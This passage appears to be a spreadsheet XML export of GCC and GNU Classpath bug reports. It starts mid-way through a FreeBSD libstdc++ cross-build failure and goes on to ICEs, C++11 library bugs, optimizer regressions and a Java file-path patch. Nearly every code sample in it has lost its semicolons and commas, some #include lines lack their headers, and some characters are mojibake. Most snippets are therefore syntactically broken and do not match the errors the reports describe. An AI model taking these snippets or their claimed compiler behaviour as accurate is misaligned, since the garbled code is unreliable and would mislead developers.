 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:50: `
    _N' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:51: `
    _S' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:52: `
    _P' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:52: `
    _U' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:52: `
    _L' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:52: `
    _N' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:52: `
    _B' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:53: `
    _P' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:53: `
    _U' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:53: `
    _L' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:53: `
    _N' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:54: `
    _C' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:55: `
    _P' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:56: `
    _U' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:56: `
    _L' was not declared in this scope
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_
 base.h:56: `
    _N' was not declared in this scope
 make[3]: *** [globals.lo] Error 1
 make[3]: Leaving directory
 `/usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/src'
 make[2]: *** [all-recursive] Error 1
 make[2]: Leaving directory
 `/usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3'
 make[1]: *** [all-recursive-am] Error 2
 make[1]: Leaving directory
 `/usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3'
 make: *** [all-target-libstdc++-v3] Error 2
 Ehm I've NFI what the hell this is I tried defining those _[LETTER]
 macros to the values of _CTYPE_[LETTER] from ctype.h
 #define _A        0x00000100L             /* Alpha */
 #define _C        0x00000200L             /* Control */
 #define _D        0x00000400L             /* Digit */
 #define _G        0x00000800L             /* Graph */
 #define _L        0x00001000L             /* Lower */
 #define _P        0x00002000L             /* Punct */
 #define _S        0x00004000L             /* Space */
 #define _U        0x00008000L             /* Upper */
 #define _X        0x00010000L             /* X digit */
 #define _B        0x00020000L             /* Blank */
 #define _R        0x00040000L             /* Print */
 #define _I        0x00080000L             /* Ideogram */
 #define _T        0x00100000L             /* Special */
 #define _Q        0x00200000L             /* Phonogram */
 _CTYPE_N wasnt defined so I defined it as 0
 #define _N 0
 You might be interrested in this comment from the ctype_base.h:
 // Information as gleaned from /usr/include/ctype.h for solaris2.5.1
 Ok it compiled a bit further now..
 Stopping there:
 In file included from
 /usr/local/cross/src/gcc-3.2/libstdc++-v3/src/locale.cc:406:
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_noninline.h: In
    static member function `static const char*
    std::ctype::classic_table()':
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_noninline.h:38: `
    _ctype_' undeclared (first use this function)
 /usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/include/i386-freebsd4/bits/ctype_noninline.h:38: (Each
    undeclared identifier is reported only once for each function it
 appears
    in.)
 make[3]: *** [locale.lo] Error 1
 make[3]: Leaving directory
 `/usr/src/gcc-objdir/i386-freebsd4/libstdc++-v3/src'
 Oh joy joy joy... This is where I gave up and started trying to do this
 with gcc-2.95.3.. Which is similarly painful it seems but I'm hopeful.
 So I decided to document my pain and send it to a mlist where a bunch of
 people will read it without any interrest.. But hey maybe it will start a
 nice chain of me too trolls..
 Best regards
 skuld
 P.S. - Please send all flames or help to skuld@titan.phear.org because I
 dont subscribe to this list.
Release:
unknown</t>
  </si>
  <si>
    <t>skuld</t>
  </si>
  <si>
    <t>GCC-50025</t>
  </si>
  <si>
    <t>[DR 1288] C++0x initialization syntax doesn't work for class members of reference type</t>
  </si>
  <si>
    <t>The following code does not compile although I expect it to:
/// BEGIN CODE ///
#include 
struct S {}
struct C {
  S 
  S 
  C( S&amp; b S &amp;&amp; c ) :  mc2{b} mc3{std::move(c)} {}
}
int main() { return 0 }
/// END CODE ///
I compile it with command:
g++ test.cpp -std=c++0x -o test.exe
The output is:
test.cpp: In constructor â€˜C::C(S&amp; S&amp;&amp;)â€™:
test.cpp:9:48: error: invalid initialization of non-const reference of type â€˜S&amp;â€™ from an rvalue of type â€˜â€™
test.cpp:9:48: error: invalid initialization of reference of type â€˜S&amp;&amp;â€™ from expression of type â€˜â€™
Compiler version (g++ -v):
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/libexec/gcc/i686-redhat-linux/4.6.0/lto-wrapper
Target: i686-redhat-linux
Configured with: ../configure --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-bugurl=http://bugzilla.redhat.com/bugzilla --enable-bootstrap --enable-shared --enable-threads=posix --enable-checking=release --with-system-zlib --enable-__cxa_atexit --disable-libunwind-exceptions --enable-gnu-unique-object --enable-linker-build-id --enable-languages=cc++objcobj-c++javafortranadagolto --enable-plugin --enable-java-awt=gtk --disable-dssi --with-java-home=/usr/lib/jvm/java-1.5.0-gcj-1.5.0.0/jre --enable-libgcj-multifile --enable-java-maintainer-mode --with-ecj-jar=/usr/share/java/eclipse-ecj.jar --disable-libjava-multilib --with-ppl --with-cloog --with-tune=generic --with-arch=i686 --build=i686-redhat-linux
Thread model: posix
gcc version 4.6.0 20110428 (Red Hat 4.6.0-6) (GCC)</t>
  </si>
  <si>
    <t>GCC-56166</t>
  </si>
  <si>
    <t>std::string::clear() can throw despite being marked noexcept</t>
  </si>
  <si>
    <t>The attached test case (which is regrettably large but I haven't found a shorter way to trigger the problem) will call terminate() when compiled with -std=c++11 despite there being no point at which an exception should escape main().  The problem is deep inside std::basic_string:
/usr/include/c++/4.7/bits/basic_string.h
    796       /**
    797        *  Erases the string making it empty.
    798        */
    799       void
    800       clear() _GLIBCXX_NOEXCEPT
    801       { _M_mutate(0 this-&gt;size() 0) }
_M_mutate can allocate memory even when it's being asked to erase the string (presumably due to internal reference-counting -- if you take 's2' out of the test case the crash goes away) and thus can throw bad_alloc.  In C++11 mode clear() is marked 'noexcept' so we wind up in terminate().</t>
  </si>
  <si>
    <t>GCC-5886</t>
  </si>
  <si>
    <t>[IA64] The Intel IA64 ABI states that the symbol _LP64 will be predefined</t>
  </si>
  <si>
    <t xml:space="preserve">	Section 7.2 of the Intel (r) Itanium (tm) processor specific Application
Binary Interface (see http://developer.intel.com/design/itanium/downloads/245370.htm)
states that the symbol _LP64 should be predefined for IA64 target with LP64 architecture.
The symbol __LP64__ is defined but not _LP64.
Also there should be an assertion for the default endian case -Aendian(little) in the
preprocessor initialization. If it is possible to produce big-endian Itanium code (and I 
haven't figured out yet if you can) then this assertion should track the compiler flag
to produce bigendian code. Otherwise it can be handled by the patch attached.
NOTE both this predefined symbol and the assertion are being added to the IA64
processor-specific Linux Standards Base document which is about to be completed. If this
report CANNOT be accomodated please let me know quickly so I can change the standard before
it is too late (I am the responsible author for this section of the LSB).
The fix below applies only to linux systems and not to all IA64 systems. Since
this symbol and assertion are required by the Intel ABI it might be better to move them
to a higher level file. However for my use I only require these symbols for Linux systems
the standard I am developing is the Linux Standards Base so I have supplied a fix for that
target only.
Release:
3.2 20020307 (experimental)
Environment:
System: Linux lsb 2.4.9-mckinley-smp #1 SMP Mon Sep 24 16:25:57 MDT 2001 ia64 unknown
Architecture: ia64
host: ia64-unknown-linux-gnu
build: ia64-unknown-linux-gnu
target: ia64-unknown-linux-gnu
configured with: ./configure
How-To-Repeat:
	cp /dev/null x.c
	gcc -dM -E x.c</t>
  </si>
  <si>
    <t>GCC-40556</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in IPA-CP with recursion</t>
  </si>
  <si>
    <t>The following valid code snippet triggers an ICE when compiled with -O2:
===================
struct A {}
struct A foo()
{
  return foo()
}
void bar()
{
  foo()
}
===================
bug.c:11:1: internal compiler error: in ipcp_analyze_node at ipa-cp.c:183
Please submit a full bug report [etc.]
The regression appeared between 2009-05-09 and 2009-05-22.</t>
  </si>
  <si>
    <t>GCC-6592</t>
  </si>
  <si>
    <t>gcc-3.0.4 bootstrap fails to link cpp0 together</t>
  </si>
  <si>
    <t>Trying to bootstrap gcc-3.0.4 on a Motorola m88k box with plain SVR4 causes the compiler to give up at building cpp0 since cppinit.o references 'target_flags' but it doesn't get linked in.
Trying to fix it myself with linking the rtlanal.o and later the $(BACKEND) stuff into it didn't work.
It must be picking up the symbol's reference from some of the includes which doesn't make much sense to me since this is just the preprocessor!?
Release:
gcc-3.0.4
Environment:
m88k-motorola-sysv4
How-To-Repeat:
mkdir objdir cd objdir
../gcc-3.0.4/configure --prefix=/MCM/gnu --enable-languages=c
gmake CFLAGS=-O LIBCFLAGS=-O BOOT_CFLAGS=-O2 bootstrap</t>
  </si>
  <si>
    <t>GCC-11778</t>
  </si>
  <si>
    <t>System.out PrintStream does too much buffering</t>
  </si>
  <si>
    <t>Compare the output of the following test case (from current CVS) compared with the JRE or an 
earlier libgcj:
public class testOut
{
  public static void main(String[] args) throws InterruptedException
  {
    for (int i=0 i &lt; 20 i++)
    {
      System.out.print(.)
      Thread.sleep(100)
    }
  }
}
System.out is buffering the output too aggressively.</t>
  </si>
  <si>
    <t>GCC-81275</t>
  </si>
  <si>
    <t>[6/7 Regression] -fsanitize=thread produce incorrect -Wreturn-type warning</t>
  </si>
  <si>
    <t>g++ -Werror=return-type -c t.cpp # no warning
g++ -Werror=return-type -fsanitize=thread -c t.cpp # warning
t.cpp:14:1: error: control reaches end of non-void function [-Werror=return-type]
 }
 ^
Affected versions:
gcc version 7.0.1 20170420 (experimental) [trunk revision 247015] (GCC)
gcc version 8.0.0 20170625 (experimental) [trunk revision 249632] (GCC)
-fsanitize={addressundefined} unaffected
$ cat t.cpp
int f1(int a int b)
{
    switch (a) {
    case 0:
	switch (b) {
	default:
	    return 0
	}
	break // NO warning if commented out
    default:
	return 0
    }
}</t>
  </si>
  <si>
    <t>GCC-131</t>
  </si>
  <si>
    <t>Internal compiler error at declaring non-template as template-friend</t>
  </si>
  <si>
    <t xml:space="preserve"> Date: 24 Mar 2000 01:04:35 +0100
 Original-Message-ID: 
 The following (syntactically wrong) Code produces an internal compiler
 error:
 -----------------
 class foo {}
 class bar
 {
	 template  friend class foo
 }
 -----------------
 $ g++ -v friend.cc 
 Reading specs from /usr/lib/gcc-lib/i686-redhat-linux/2.95.2/specs
 gcc version 2.95.2 19991024 (release)
  /usr/lib/gcc-lib/i686-redhat-linux/2.95.2/cpp -lang-c++ -v -D__GNUC__=2 -D__GNUG__=2 -D__GNUC_MINOR__=95 -D__cplusplus -D__ELF__ -Dunix -D__i386__ -Dlinux -D__ELF__ -D__unix__ -D__i386__ -D__linux__ -D__unix -D__linux -Asystem(posix) -D__EXCEPTIONS -Acpu(i386) -Amachine(i386) -Di386 -D__i386 -D__i386__ -Di686 -Dpentiumpro -D__i686 -D__i686__ -D__pentiumpro -D__pentiumpro__ friend.cc friend.ii
 GNU CPP version 2.95.2 19991024 (release) (i386 Linux/ELF)
 #include ... search starts here:
 #include  search starts here:
  /usr/lib/gcc-lib/i686-redhat-linux/2.95.2/../../../../include/g++-3
  /usr/local/include
  /usr/lib/gcc-lib/i686-redhat-linux/2.95.2/include
  /usr/include
 End of search list.
 The following default directories have been omitted from the search path:
  /usr/lib/gcc-lib/i686-redhat-linux/2.95.2/../../../../i686-redhat-linux/include
 End of omitted list.
  /usr/lib/gcc-lib/i686-redhat-linux/2.95.2/cc1plus friend.ii -quiet -dumpbase friend.cc -version -o friend.s
 GNU C++ version 2.95.2 19991024 (release) (i686-redhat-linux) compiled by GNU C version 2.95.2 19991024 (release).
 friend.cc:5: Internal compiler error.
 friend.cc:5: Please submit a full bug report.
 friend.cc:5: See  for instructions.
Release:
2.95.2</t>
  </si>
  <si>
    <t>GCC-14261</t>
  </si>
  <si>
    <t>ICE due to if-conversion</t>
  </si>
  <si>
    <t>The attached program will not compile with -O2 on IA64 linux.  If you turn off
if-conversion it will compile. See
http://gcc.gnu.org/ml/gcc/2004-02/msg01115.html for some analysis from Jim
Wilson.  This was tested with the ToT sources dated 
20040212 and also exists on older GCC compilers for IA64 Linux.
typedef union YYSTYPE {
    double dval
    int intval
} YYSTYPE
YYSTYPE *x
int
knparse (void)
{
  YYSTYPE yyvsa[200]
  register YYSTYPE *yyvsp
  YYSTYPE yyval *x
  yyvsp = 
  if (yyvsp[3].intval &gt; yyvsp[0].intval)
     yyval.intval = yyvsp[3].intval
  else
     yyval.intval = yyvsp[0].intval
  *x = yyval
}</t>
  </si>
  <si>
    <t>GCC-57745</t>
  </si>
  <si>
    <t>missing recursive lifetime extension within std::initializer_list</t>
  </si>
  <si>
    <t>Consider:
#include 
struct A {
   A() { std::cout &lt;&lt;  A() &lt;&lt; std::endl }
  ~A() { std::cout &lt;&lt; ~A() &lt;&lt; std::endl }
}
struct B {
  const A 
  ~B() { std::cout &lt;&lt; ~B() &lt;&lt; std::endl }
}
struct C {
  std::initializer_list b
  ~C() { std::cout &lt;&lt; ~C() &lt;&lt; std::endl }
}
int main() {
  const C 
  std::cout &lt;&lt; ----- &lt;&lt; std::endl
}
This should print:
 A()
 A()
-----
~C()
~B()
~A()
~B()
~A()
... but g++ destroys the two A temporaries at the end of the full-expression. They are lifetime-extended because they are bound to B::a references in the aggregate-initialization of the B subobjects of the underlying array of the initializer_list which is itself lifetime-extended.</t>
  </si>
  <si>
    <t>GCC-13631</t>
  </si>
  <si>
    <t>Problems in messages</t>
  </si>
  <si>
    <t>The messages facet is broken.
1) The return values of the get member function depend on global state
as set by textdomain() (which is called from messages::do_open()). This
is forbidden by the resolution of DR 360.
2) messages doesn't work at all (get() always returns the
empty string).</t>
  </si>
  <si>
    <t>GCC-25306</t>
  </si>
  <si>
    <t>fill_n generate_n assume Size is modifiable</t>
  </si>
  <si>
    <t>I came across this while gathering background for my post in c++std-lib-16112. I thgought I might as well let you know in case you think it's important enough to worry about (Size is only required to be convertible to an integral type which doesn't mean it needs to have the predecrement operator defined). The incorrect return type in this test case works around bug #25304.
$ cat t.cpp &amp;&amp; g++ -c t.cpp
#include 
struct Size {
    operator int() { return 0 }
private:
    void operator=(Size
}
template int* std::fill_n (int* Size const int
template int* std::generate_n (int* Size int (*)())
int main () { }
/usr/local/gcc-4.0.2/lib/gcc/sparc-sun-solaris2.9/4.0.2/../../../../include/c++/4.0.2/bits/stl_algo.h: In function '_OutputIterator std::generate_n(_OutputIterator _Size _Generator) [with _OutputIterator = int* _Size = Size _Generator = int (*)()]':
t.cpp:10:   instantiated from here
/usr/local/gcc-4.0.2/lib/gcc/sparc-sun-solaris2.9/4.0.2/../../../../include/c++/4.0.2/bits/stl_algo.h:1003: error: no match for 'operator--' in '--__n'
/usr/local/gcc-4.0.2/lib/gcc/sparc-sun-solaris2.9/4.0.2/../../../../include/c++/4.0.2/bits/stl_algobase.h: In static member function 'static _OutputIterator std::__fill_n::fill_n(_OutputIterator _Size const _Tp&amp;) [with _OutputIterator = int* _Size = Size _Tp = int]':
/usr/local/gcc-4.0.2/lib/gcc/sparc-sun-solaris2.9/4.0.2/../../../../include/c++/4.0.2/bits/stl_algobase.h:642:   instantiated from '_OutputIterator std::fill_n(_OutputIterator _Size const _Tp&amp;) [with _OutputIterator = int* _Size = Size _Tp = int]'
t.cpp:9:   instantiated from here
/usr/local/gcc-4.0.2/lib/gcc/sparc-sun-solaris2.9/4.0.2/../../../../include/c++/4.0.2/bits/stl_algobase.h:617: error: no match for 'operator--' in '--__n'</t>
  </si>
  <si>
    <t>GCC-63284</t>
  </si>
  <si>
    <t>[4.9/5 Regression] -fcompare-debug issue due to redirection to __builtin_unreachable ()</t>
  </si>
  <si>
    <t>/* { dg-do compile } */
/* { dg-options -O2 -fcompare-debug } */
int a[10] *b *d c f
int fn2 (void)
void fn3 (void)
void fn4 (int)
static int
fn1 (int x)
{
  int e = a[0]
  if (e)
    return 1
  if (b)
    switch (x)
      {
      case 1:
        if (d)
          e = fn2 ()
        else
          fn3 ()
        break
      case 0:
        if (d)
          {
            fn3 ()
            if (c)
              fn4 (1)
          }
        else
          fn4 (0)
      }
  return e
}
void
fn6 (void)
{
  f = fn1 (0)
}
fails on the 4.9 branch it happens to succeed on the trunk but when one looks at *.optimized dumps differences there are still undesirable differences in the order of predecessors of one bb (and thus also PHI argument order).</t>
  </si>
  <si>
    <t>GCC-39103</t>
  </si>
  <si>
    <t>Deadlock in AWT</t>
  </si>
  <si>
    <t>gcc 4.3 branch needs this patch:
http://article.gmane.org/gmane.comp.java.classpath.patches/12149</t>
  </si>
  <si>
    <t>GCC-57907</t>
  </si>
  <si>
    <t>warning: switch -mcpu=cortex-a15 conflicts with -march=armv7-a switch [enabled by default]</t>
  </si>
  <si>
    <t>The manpage states that This option [-march] can be used in conjunction with or instead of the -mcpu= option. and this works for e.g. -mcpu=cortex-a9. On the other GCC complains for -mcpu=cortex-a15 and -mcpu=cortex-a7 in conjunction with -march=armv7-a.
The following command line reproduces the issue:
&gt; echo int main() {} | /usr/local/genode-gcc/bin/genode-arm-g++ -c -x c++ - -o /tmp/stdin.o -march=armv7-a -mcpu=cortex-a15
:1:0: warning: switch -mcpu=cortex-a15 conflicts with -march=armv7-a switch [enabled by default]
Examples in bugzilla never user both options for ARM but just -mcpu. Will the combination be supported in the future or should I adapt the mcpu-only approach? Does it have drawbacks?</t>
  </si>
  <si>
    <t>christian.helmuth</t>
  </si>
  <si>
    <t>GCC-18742</t>
  </si>
  <si>
    <t>small struct not passed correctly as vararg</t>
  </si>
  <si>
    <t xml:space="preserve">
	The following code tests that complex values are passed
        correctly. A value received by the callee is tested component by
        component to be equal with the (global) value that was passed.
        This fails for the  struct of type at2 that is passed as a var arg.
    failed in foo.c: 43
    failed in foo.c: 44
Environment:
System: Darwin jonagold.local 7.6.0 Darwin Kernel Version 7.6.0: Sun Oct 10 12:05:27 PDT 2004 root:xnu/xnu-517.9.4.obj~1/RELEASE_PPC Power Macintosh powerpc
host: powerpc-apple-darwin7.6.0
build: powerpc-apple-darwin7.6.0
target: powerpc-apple-darwin7.6.0
configured with: ../gcc/configure --prefix=/scratch/lindig --enable-languages=c : (reconfigured) ../gcc/configure --prefix=/scratch/lindig --enable-languages=c
How-To-Repeat:
    Compile and run the following code.
# 1 foo.c
# 1 
# 1 
# 1 foo.c
# 1 /scratch/lindig/lib/gcc/powerpc-apple-darwin7.6.0/4.0.0/include/stdarg.h 1 3 4
# 43 /scratch/lindig/lib/gcc/powerpc-apple-darwin7.6.0/4.0.0/include/stdarg.h 3 4
typedef __builtin_va_list __gnuc_va_list
# 105 /scratch/lindig/lib/gcc/powerpc-apple-darwin7.6.0/4.0.0/include/stdarg.h 3 4
typedef __gnuc_va_list va_list
# 5 foo.c 2
extern int printf (char * ...)
static int errors = 0
static void failed( int line )
{ printf (failed in %s: %d\n foo.c line) errors++ }
static unsigned long int *av2 = (unsigned long int *) 361451618U
static struct bt2 { float fv2 } kv2 = { 3984.018652 }
static
struct dt2
{ char gv2 struct ct2 { unsigned char hv2 unsigned char iv2 } jv2 }
lv2
=
    { '\x4f' { '\x27' '\x20' } }
static struct at2 { short int bv2 char cv2 } dv2 = { 14855 '\x3d' }
static double ev2 = 67318.083071
static unsigned long int * callee_af2( struct bt2 ap2 struct dt2 bp2 ... )
{
    va_list ap
    struct at2 mv2
    double nv2
    __builtin_va_start(apbp2)
    if (kv2.fv2 != ap2.fv2) failed (33)
    if (lv2.gv2 != bp2.gv2) failed (34)
    if (lv2.jv2.hv2 != bp2.jv2.hv2) failed (35)
    if (lv2.jv2.iv2 != bp2.jv2.iv2) failed (36)
    mv2 = __builtin_va_arg(apstruct at2)
    nv2 = __builtin_va_arg(apdouble)
    if (mv2.bv2 != dv2.bv2) failed (39)
    if (mv2.cv2 != dv2.cv2) failed (40)
    if (nv2 != ev2) failed (41)
    __builtin_va_end(ap)
    return av2
}
static void caller_bf2( )
{
    unsigned long int *ov2
    ov2 = callee_af2 (kv2 lv2 dv2 ev2) if (av2 != ov2) failed (49)
}
int main( int argc char **argv )
{ caller_bf2 () return errors }</t>
  </si>
  <si>
    <t>lindig</t>
  </si>
  <si>
    <t>CLASSPATH-22935</t>
  </si>
  <si>
    <t>Don't work RandomAccessFile with Windows's drive prefix</t>
  </si>
  <si>
    <t xml:space="preserve">Hi
RandomAccessFile couldn't treat Windows's drive prefix correctly. For example:
 RandomAccessFile f = new RandomAccessFile(/c:/tmp/test.txtr)
This code throw FileNotFoundException. I investigated this cause. Finally I found FileChannelImpl constructor can't treat the file path begining of '/' with drive prefix such as /c:/tmp/... It should be like c:/tmp/.... Following patch fixed this problem.
regards
Takashi Okamoto
ile.java.orig  2005-05-04 19:58:58.527491300 +0900
+++ java/io/RandomAccessFile.java       2005-05-04 19:59:21.046471100 +0900
@@ -1227 +1227 @@
           s.checkWrite(fileName)
       }
-    ch = new FileChannelImpl (file fdmode)
+    ch = new FileChannelImpl (new File(file).getPath() fdmode)
     fd = new FileDescriptor(ch)
     out = new DataOutputStream (new FileOutputStream (fd))
     in = new DataInputStream (new FileInputStream (fd))
</t>
  </si>
  <si>
    <t>GCC-64629</t>
  </si>
  <si>
    <t>[5 Regression] -Wformat-security warns with const char *const vars</t>
  </si>
  <si>
    <t>extern void bar (int const char * ...) __attribute__((format (printf 2 3)))
void
foo (void)
{
  const char *const msg = abc
  bar (1 msg)
}
started warning with -Wformat -Wformat-security with r217814.  Was that an intentional change for this case?
Seen on libcpp/ where the first hunk no longer works around the warning
while it used to work with gcc 4.9 and earlier.</t>
  </si>
  <si>
    <t>GCC-30913</t>
  </si>
  <si>
    <t>SRA bugs with anon bitfields</t>
  </si>
  <si>
    <t>// gcc -O2 -Wall -S uninit-anon-bitfield.c
struct foo {
  unsigned int a:16
  unsigned int b:11
  unsigned int :5
}
extern struct foo bar
void foo(int a int b)
{
  struct foo tmp
  tmp.a = a
  tmp.b = b
  bar = tmp
}
warns while it should not the anon bitfield is just a padding can't be
assigned to.  There is no warning with -fno-tree-sra.
The bug is in SRA IMHO when scalarizing a struct assignment it should certainly
ignore the anon bitfields (TREE_CODE (x-&gt;element) == FIELD_DECL &amp;&amp; DECL_NAME (x-&gt;element) == NULL &amp;&amp; TREE_CODE (TREE_TYPE (x-&gt;element)) == BIT_FIELD_TYPE ?).
Both in generate_element_copy generate_copy_inout and perhaps in other places
as well.  Or not instantiate the anon bitfields at all.
There is another bug e.g. for
struct foo {
  unsigned int a:16
  unsigned int b:11
  unsigned int :5
}
extern struct foo bar
void foo(struct foo a)
{
  struct foo tmp
  tmp = a
  bar = tmp
}
SRA certainly should not have decided to use element copies at all that makes
many times worse code.</t>
  </si>
  <si>
    <t>GCC-39794</t>
  </si>
  <si>
    <t>[4.4/4.5 Regression] Miscompile with -O2 -funroll-loops</t>
  </si>
  <si>
    <t>The following testcase aborts with -O2 -funroll-loops but passes with plain -O2 for me on today's trunk.
--cut here
extern void abort()
void foo(int *a int n)
{
  int i
  for (i = 0 i &lt; n i++)
    {
      a[i] *= 2
      a[i+1] = a[i-1] + a[i-2]
    }
}
enum {N = 16}
int a[N]
int ref[N] = {0 1 4 2 10 12 24 44 72 136 232 416 736 1296 2304 2032}
int main()
{
  int i
  for (i = 0 i &lt; N i++)
    a[i] = i
  foo(a + 2 N - 3)
  for (i = 0 i &lt; N i++)
    if (ref[i] != a[i])
      abort()
  return 0
}
-- cut here</t>
  </si>
  <si>
    <t>GCC-4129</t>
  </si>
  <si>
    <t>ICE in redirect_edge_and_branch for arm-elf-gcc</t>
  </si>
  <si>
    <t xml:space="preserve">	Gcc gets an internal compiler error.
Release:
3.1 20010825 (experimental)
Environment:
System: Linux fishpond.ninemoons.com 2.4.2-2smp #1 SMP Sun Apr 8 20:21:34 EDT 2001 i686 unknown
Architecture: i686
host: i686-pc-linux-gnu
build: i686-pc-linux-gnu
target: arm-unknown-elf
configured with: /src/sourceware/gcc/gcc/configure --with-gcc-version-trigger=/src/sourceware/gcc/gcc/gcc/version.c -v --prefix=/usr/sourceware --host=i686-pc-linux-gnu --target=arm-elf --enable-shared
How-To-Repeat:
Script started on Sat Aug 25 21:12:48 2001
$ arm-elf-gcc -c -O bug.i
bug.i:699:22: warning: multi-character character constant
bug.i:700:23: warning: multi-character character constant
bug.i:701:23: warning: multi-character character constant
bug.i:702:30: warning: multi-character character constant
bug.i:703:25: warning: multi-character character constant
bug.i:704:24: warning: multi-character character constant
bug.i:705:23: warning: multi-character character constant
bug.i:706:34: warning: multi-character character constant
bug.i:707:24: warning: multi-character character constant
bug.i:708:24: warning: multi-character character constant
bug.i:709:24: warning: multi-character character constant
bug.i:710:23: warning: multi-character character constant
bug.i:711:26: warning: multi-character character constant
bug.i:712:28: warning: multi-character character constant
bug.i:713:23: warning: multi-character character constant
bug.i:714:35: warning: multi-character character constant
bug.i:715:25: warning: multi-character character constant
bug.i:716:24: warning: multi-character character constant
bug.i:717:26: warning: multi-character character constant
bug.i:718:26: warning: multi-character character constant
bug.i:719:24: warning: multi-character character constant
bug.i:720:22: warning: multi-character character constant
bug.i:721:23: warning: multi-character character constant
bug.i:722:22: warning: multi-character character constant
bug.i:723:29: warning: multi-character character constant
bug.i:724:28: warning: multi-character character constant
bug.i:725:25: warning: multi-character character constant
bug.i:726:26: warning: multi-character character constant
bug.i:727:25: warning: multi-character character constant
bug.i:728:23: warning: multi-character character constant
bug.i:729:25: warning: multi-character character constant
bug.i:730:25: warning: multi-character character constant
bug.i:731:25: warning: multi-character character constant
bug.i:732:24: warning: multi-character character constant
bug.i:733:34: warning: multi-character character constant
bug.i:734:38: warning: multi-character character constant
bug.i:735:39: warning: multi-character character constant
bug.i:736:23: warning: multi-character character constant
bug.i:737:26: warning: multi-character character constant
bug.i:738:24: warning: multi-character character constant
bug.i:753:31: warning: multi-character character constant
bug.i: In function `handle_lcp':
bug.i:1728: Internal compiler error in redirect_edge_and_branch at flow.c:2009
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
$ exit
exit
Script done on Sat Aug 25 21:12:59 2001
Here is the preprocessed source in uuencoded form:
See attachments for bug.i
</t>
  </si>
  <si>
    <t>GCC-61870</t>
  </si>
  <si>
    <t>internal compiler error: in get_expr_operands at tree-ssa-operands.c:1035</t>
  </si>
  <si>
    <t>When I compile source code I see the following error.
src/lastfm_scrobbler.cpp: In lambda function:
src/lastfm_scrobbler.cpp:193:1: internal compiler error: in get_expr_operands at tree-ssa-operands.c:1035
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Preprocessed source stored into /tmp/cc6F4c5e.out file please attach this to your bugreport.
The line that does not compile is:
m_scrobblingThread = std::thread([this]() { backgroundScrobbling() })
The following change fixes this:
m_scrobblingThread = std::thread([this]() { this-&gt;backgroundScrobbling() })</t>
  </si>
  <si>
    <t>dzidzitop</t>
  </si>
  <si>
    <t>GCC-68846</t>
  </si>
  <si>
    <t>Pointer function as LValue doesn't work when the assignment regards a dummy argument.</t>
  </si>
  <si>
    <t>Created attachment 36988
A simple program used to expose the bug
! COMPILER VERSION
!==============================================================================
Compiler version:
GNU Fortran (GCC) 6.0.0 20151122 (experimental)
Copyright (C) 2015 Free Software Foundation Inc.
This is free software see the source for copying conditions.  There is NO
warranty not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE
!==============================================================================
If a function pointer as LValue is used inside a procedure and the assignment regards one of the dummy arguments of the procedure what happens is:
1) A stragne error on the INTENT of the dummy argument if it si INTENT(IN)
!==============================================================================
     ./test.f90:126:30:
       subgrid%jmp(ij) = value
                              1
      Error: Dummy argument â€˜_F.DA0â€™ with INTENT(IN) in pointer association context (pointer assignment) at (1)
!==============================================================================
2) An internal compiler error if the dummy argumet is INTENT(INOUT)</t>
  </si>
  <si>
    <t>GCC-46315</t>
  </si>
  <si>
    <t>[4.5 regression] -O2 -fno-strict-overflow causes wrong code generation</t>
  </si>
  <si>
    <t>Created attachment 22294
testcase
If we disable -fstrict-overflow in the -O2 optimization the testcase segfault but works fine with -O1 or -fstrict-overflow on in the -O2 optimization.
flame@yamato mytmpfs % gcc -O2 -fno-strict-overflow testcase.c -o testcase
flame@yamato mytmpfs % ./testcase
0x400770
0x2
zsh: segmentation fault (core dumped)  ./testcase</t>
  </si>
  <si>
    <t>GCC-49619</t>
  </si>
  <si>
    <t>[4.5 Regression] ICE in simplify_subreg at simplify-rtx.c:5362</t>
  </si>
  <si>
    <t>Created attachment 24663
Output of ajo-gcc -O1 -fno-tree-fre -c test.c -v
This failure reproduces for me with svn revision 175547
